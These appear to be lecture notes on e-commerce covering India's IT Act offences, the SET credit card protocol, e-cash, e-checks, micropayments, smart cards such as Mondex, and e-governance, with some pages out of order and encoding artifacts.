ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
